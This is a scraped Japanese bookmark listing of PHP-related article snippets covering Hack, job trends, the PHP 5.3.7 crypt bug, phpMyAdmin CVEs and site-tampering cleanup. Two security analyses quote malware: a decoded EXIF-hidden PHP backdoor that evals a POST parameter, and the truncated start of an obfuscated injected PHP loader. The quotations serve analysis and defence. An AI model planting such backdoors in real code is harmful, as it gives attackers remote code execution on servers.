Facebook、新プログラミング言語「Hack」をオープンソースで公開
米Facebookは3月20日(現地時間)、社内で使っている新プログラミング言語「Hack」をオープンソースで公開した。 Hackは、Facebookがサービス構築のコーディングを高速化する目的で開発したPHPベースの新プログラミング言語。同社がオープンソースで公開してるPHP高速化JITコンパイラ「HipHop Virtual Machine(HHVM)」に対応する。PHPの開発サイクルの速さに静的型付け手法や他の言語の多様な機能を合わせたものという。ライセンスはHHVMと同じBSD。 動的言語と静的言語の長所を併せ持っているという。例えばHackでは、C言語などと同様に、コードに矛盾があるとエラーを表示してくれる。
フェイスブック、HHVM向けの新プログラミング言語「Hack」を発表
PHPと連携して利用できるHHVM向けの新プログラミング言語「Hack」をフェイスブックが公開。開発速度と安全性を両立させつつ、段階的導入も可能な実装になっているという。 米フェイスブックは2014年3月20日、同社がオープンソースで開発しているJITコンパイラのHHVM(HipHop Virtual Machine)向けに、PHPとシームレスに連携できる新しいプログラミング言語の「Hack」を発表した。HHVMランタイムプラットフォームの一環としてHackのオープンソース版も公開している。 フェイスブックはHackについて、「PHPの開発スピードと、静的型付言語の統制性を調和させ、他の現代プログラミング言語に共通する多くの特徴を付加した」言語であると説明する。 動的型付言語は開発ペースこそ速いものの初期段階でエラーを検出するのが難しく、一方の静的型付言語は迅速さに欠けるという難点があった
メタデータに埋め込まれたマルウエア
今回は攻撃者による“だまし”に関するブログを中心に紹介する。最初は、JPEG画像のメタデータにマルウエアを仕込むケース。JPEG画像のメタデータにマルウエアを仕込んだPHPバックドアをスペインのドメイン(.es)で見つけたとして、ブログで注意を促している。同様の手口は、今年6月に米スキュリが報告している。 JPEGファイルのコードを見ると興味深い文字列が並んでおり、画像のEXIFデータと合致する。 JPEGファイルのコード 画像のEXIFデータ EXIFデータのModelo(モデル)情報とMarca(メーカー)情報に同じ文字列が確認できる。これを解読すると「if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"])); 」となり、POSTパラメータ「zz1」を通じて取得するいかなる数値も実行する。 コードの実行には、PHPの「ex
米国でこの8年間のJava案件数の増加率はほぼ0%で、PHPは250%増。日本でも上級PHPerがいないと売り上げは伸びない!?:吉政忠志の考える。行動する。改善する。:エンジニアライフ
米国でこの8年間のJava案件数の増加率はほぼ0%で、PHPは250%増。日本でも上級PHPerがいないと売り上げは伸びない!? PHPで作られたWebサイトが世界中で2億4400万サイトとなり、シェアは40%となりました。そして、そのシェアは今も増えているそうです。(インターネットコム2013年2月の記事を参照) アメリカではJavaの案件数はこの8年間で増えていません。一方でPHPは2.5倍になりました。日本でもそんな感じじゃないでしょうか?もしそうだとすると、Javaメインの事業体では売り上げは伸びないということになります。 ※2014年5月集計では全米のJava求人数は0%成長ではなく、▲30%成長になっています。(2014年10月6日加筆) グラフ:案件数比較 日本の求人数ではJavaが一位でPHPは二位となり、日本国内のJavaの求人数は1万6千件に対して、PHPは1万件を超え
はじめの言語の賞味期限 - Kato Kazuyoshi
ライブドアブログの PSGI 化の話 は良いはなしだと思う。一方で、私はあんまり Perl が好きじゃないので、10年にわたって生き続けた Perl アプリケーションが、次の10年にむけてアップをはじめているのは、ちょっとしたホラーでもある。 Twitter と Ruby と JVM ライブドアブログが、将来に向けて mod_perl から PSGI + Starlet にかえたように、将来に向けてプログラミング言語をかえる人達も存在する。最近の事例で有名なのは、Twitter の Ruby から JVM 言語群への移行だろう。 OSCON Java 2011 の Twitter: From Ruby on Rails to the JVM では、JVM への移行に至った理由として Ability to handle server workloads A real concurrency
ヤバイWordPressテーマを見分けるための方法 | Firegoby
前回、”free wordpress themes”って検索してテーマを探すと超ヤバイよ という記事を書きました。 お陰様でとても拡散したんですが、危険なテーマを見わけるための検証方法を伏せたのが裏目でちょっとあれだったので、それについて解説します。 Theme Authenticity Checker (TAC) によるチェック WordPress › Theme Authenticity Checker (TAC) « WordPress Plugins 結論から言いますが、このプラグインによるチェックでは不完全でした。 実際に “free wordpress themes” で Google 検索して出てくる1つ目(苦笑)の ”http://www.themesbase.com/” というサイトのテーマで検証してみましょう。 今回は、このサイトの一つ目で紹介されている Pioneer
脆弱性を突かれて Web サイトを改ざんされてウィルス呼び出しコードを埋めこまれたファイルの調べ方と除去と対応作業と申請手続きについて
改ざんされてウィルス配布コード埋めこまれてから復旧までの作業や申請の手続きについてまとめていきます。 追記: 「改ざんされた場合そのものの対処方法」という意味で書かせて頂きました。phpMyAdmin の脆弱性についてではなく全般的な内容となっております。誤解を与える表現となってしまい申し訳御座いません。 今回埋めこまれた不正なコード 実際のコードは改行やスペースがなくなって一行のコードとなっておりますので非常に気づきにくいです。 <?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) { $eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn1XULdmbqxGU7h1Rn
そらいさんのサイトが改竄されたそうなので解析してみた
そらいさんのサービスが改ざん被害にあったとのことで、攻撃コードが載っていたので解析して見ました。 ということで、上記のコードを解析しましたが、難読化の仕組みは単純なのですが、コードを追いかけるのに中々疲れましたww 問題のコード問題のコードはこれです。 <?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) { $eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn1XULdmbqxGU7h1Rn1XULdmbqZVUzElNmNTVGxEeNt1ZzkFcmJyJuUTNyZGJuciLxk2cwRCLiICKuVHdlJHJn4SNykmckRiLnsTKn4iInIiL
Wordpressサイト改ざん.htaccessリダイレクトアタック被害の応急処置方法〜ヘテムル利用者で被害拡大 | セキュリティソフト30日無料比較
先日の記事CMSを使ったWEBサイトを狙う.htaccessリダイレクトアタックというwebサイト改ざん被害が後を絶たず、レンタルサーバーへテムル利用者の多くの方からお問い合わせをいただいたため、ここに一応の応急処置を書き記します。 あくまでもこれはウイルス配布サイトへのリダイレクトを一時的に阻止するだけの応急処置です。 ※正確な原因は不明です。以下の処方は、あくまでも鎮痛剤のような一時的な対処にすぎません。 ※2011年11月25日各所記事訂正 当初phpmyadminが原因と判断していましたが、wordpressのプラグインの脆弱性を狙った不正な攻撃と判断し各所訂正を行いました。hetemlのデータベースサーバーは公開サーバーとは別になっているためphpmyadmin経由でのリスクは可能性としては限りなく少ないものです。 つまり利用するサーバーの問題ではなくCMSに追加したプラグインに
第43回 PHP 5.3のcrypt関数の問題 | gihyo.jp
PHP 5.3.7のcrypt関数に重大なセキュリティ上の問題が発見されました。この問題は大きく報道されているのでご存知の方も多いと思います。同時にPHP本体のセキュリティ状態についても不安に思った方も多いと思います。 PHP 5.3.7のcrypt関数のバグは、攻撃が成功した場合のダメージは非常に大きく、攻撃が可能な場合は必ず成功します。しかし、攻撃経路があるシステムは限定的でしょう。 crypt関数のバグ 最近のPHPで行われたcrypt関数のバグ修正は3つあります。 PHP 5.3.7で修正したバグ ─ その1 PHP 5.3.7ではcrypt_blowfishを利用した場合、8ビット文字(マルチバイト文字エンコーディングなど)を利用した場合に脆弱になってしまう問題を修正しました。 この脆弱性は2011/6/20にレポートされており、crypt_blowfishのコードを含む製品に影
クローラを作る技術と設計 (毎週のハンズオン勉強会資料)
3. XPathXML や HTML の任意の位置を取得するための式XPathエンジンがあれば、 XPathを指定して HTML 上の値を簡単に持ってこれる 4. XPath<?php$url = 'http://www.nicovideo.jp/';libxml_use_internal_errors(true);$doc = new DOMDocument();$doc->loadHTML(file_get_contents($url));libxml_clear_errors();$xpath = new DOMXPath($doc);foreach ($xpath->query('//a') as $node) { echo $node->textContent . "";}
New community features for Google Chat and an update on Currents
Join the official community for Google Workspace administrators In the Google Cloud Community, connect with Googlers and other Google Workspace admins like yourself. Participate in product discussions, check out the Community Articles, and learn tips and tricks that will make your work and life easier. Be the first to know what's happening with Google Workspace. ______________ Learn about more Goo
PHP5.3.7のcrypt関数のバグはこうして生まれた
昨日のブログエントリ「PHP5.3.7のcrypt関数に致命的な脆弱性(Bug #55439)」にて、crypt関数の重大な脆弱性について報告しました。脆弱性の出方が近年まれに見るほどのものだったので、twitterやブクマなどを見ても、「どうしてこうなった」という疑問を多数目にしました。 そこで、このエントリでは、この脆弱性がどのように混入したのかを追ってみたいと思います。 PHPのレポジトリのログや公開されているソースの状況から、PHP5.3.7RC4までこのバグはなく、PHP5.3.7RC5でこのバグが混入した模様です。RC5はPHP5.3.7最後のRelease Candidateですから、まさに正式リリースの直前でバグが入ったことになります。 バグの入る直前のソースは、ここの関数php_md5_crypt_rから参照することができます。以下に、おおまかな流れを図示します。まずはバ
PHP5.3.7のcrypt関数に致命的な脆弱性(Bug #55439)
PHP5.3.7のcrypt関数には致命的な脆弱性があります。最悪のケースでは、任意のパスワードでログインできてしまうという事態が発生します。該当する利用者は、至急、後述する回避策を実施することを推奨します。 概要 PHPのcrypt関数は、ソルト付きハッシュ値を簡単に求めることができます(公式リファレンス)。crypt関数のハッシュアルゴリズムとしてMD5を指定した場合、ソルトのみが出力され、ハッシュ値が空になります。これは、crypt関数の結果がソルトのみに依存し、パスワードには影響されないことを意味し、crypt関数を認証に用いている場合、任意のパスワードでログインに成功する可能性があります。 影響を受けるアプリケーション crypt関数を用い、ハッシュアルゴリズムとしてMD5を指定しているアプリケーション。 環境にも依存しますが、デフォルトがMD5の場合もあります。筆者のテスト環境
もし『よくわかるPHPの教科書』の著者が徳丸浩の『安全なWebアプリケーションの作り方』を読んだら - ockeghem's blog
たにぐちまことさんの書かれた『よくわかるPHPの教科書(以下、「よくわかる」)』を購入してパラパラと見ていたら、セキュリティ上の問題がかなりあることに気がつきました。そこで、拙著「体系的に学ぶ 安全なWebアプリケーションの作り方(以下、徳丸本)」の章・節毎に照らし合わせて、「よくわかる」の脆弱性について報告します。主に、徳丸本の4章と5章を参照します。 4.2 入力処理とセキュリティ 「よくわかる」のサンプルや解説では、入力値検証はほとんどしていません。しかし、入力値検証をしていないからといって即脆弱かというとそうではありません。徳丸本でも強調しているように、入力値検証はアプリケーション要件(仕様)に沿っていることを確認するもので、セキュリティ対策が目的ではないからです。 「よくわかる」の中で、私が見た範囲で唯一の入力値検証は、郵便番号のチェックをするものです。以下に引用します(「よくわ
phpMyAdminにおける任意スクリプト実行可能な脆弱性の検証 - ockeghem's blog
phpMyAdmin(3.3.10.2未満、3.4.3.1未満)には、リモートから任意のスクリプトが実行可能な脆弱性があります。このエントリでは、この脆弱性が発生するメカニズムと対策について報告します。 概要 phpMyAdminには下記の2種類の脆弱性の組み合わせにより、リモートから任意のスクリプトを実行させられる脆弱性があります。 CVE-2011-2505 CVE-2011-2506 該当するバージョンは以下の通りです。 phpMyAdmin バージョン3.3.10.2未満 phpMyAdmin バージョン3.4.3.1未満 影響を受ける条件は、上記バージョンのphpMyAdminを使用していることに加えて、以下をすべて満たす場合です。 setup/index.phpとsetup/config.phpを外部から実行できる phpMyAdminのconfigディレクトリが存在し、PHP
phpMyAdminにて任意のコードを実行可能な脆弱性(CVE-2011-2505, CVE-2011-2506)に関する検証レポート
phpMyAdminにて任意のコードを実行可能な脆弱性(CVE-2011-2505, CVE-2011-2506)に関する検証レポート Tweet 2011/07/29 NTTデータ先端技術株式会社 辻 伸弘 泉田 幸宏 小松 徹也 【概要】 phpMyAdminにセッション変数内のデータを変更可能な脆弱性(CVE-2011-2505)が発見されました。 この脆弱性は、phpMyAdmin上の$_SESSION配列にPHPコードを埋め込むことが可能です。また、phpMyAdminに変数を適切に処理しない脆弱性(CVE-2011-2506)が発見されました。 この脆弱性は、コンフィグ作成生成用スクリプトにおいて変数内データを適切に処理しないため、PHPコードを含むファイルを出力可能です。これらの脆弱性を組み合わせて利用することにより、Webサーバの実行権限で任意のPHPコードを実行可能となり
Pinoco0.4はクロージャですごくなる - なんたらノート第三期ベータ
Pinoco0.4.0をリリースしました。 Downloads · tanakahisateru/pinoco · GitHub 変更点はこちらで簡単に。 Changelog · tanakahisateru/pinoco Wiki · GitHub 重要な点は、データベースをサポートしたところ。もちろん単にPDO用のライブラリあります、ってだけではなく、Pinocoのコレクションでうまく動くようにあれこれしています。その基礎になるのが、Pinoco_Varsに追加されたregisterAsLazyメソッド。簡単にいうと、これで設定したプロパティは遅延評価で値を決めるというもの。実際にアクセスされるまで値の決定を遅らせます。いちど決まれば再決定のためにコストのかかる処理をしません。 また、Xdebugがない環境でも、通常のPHPエラーにスタックトレースが付いたり、捕捉しそこねた例外がすごく
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
http://japan.internet.com/webtech/20120417/5.html
http://japan.internet.com/webtech/20110824/1.html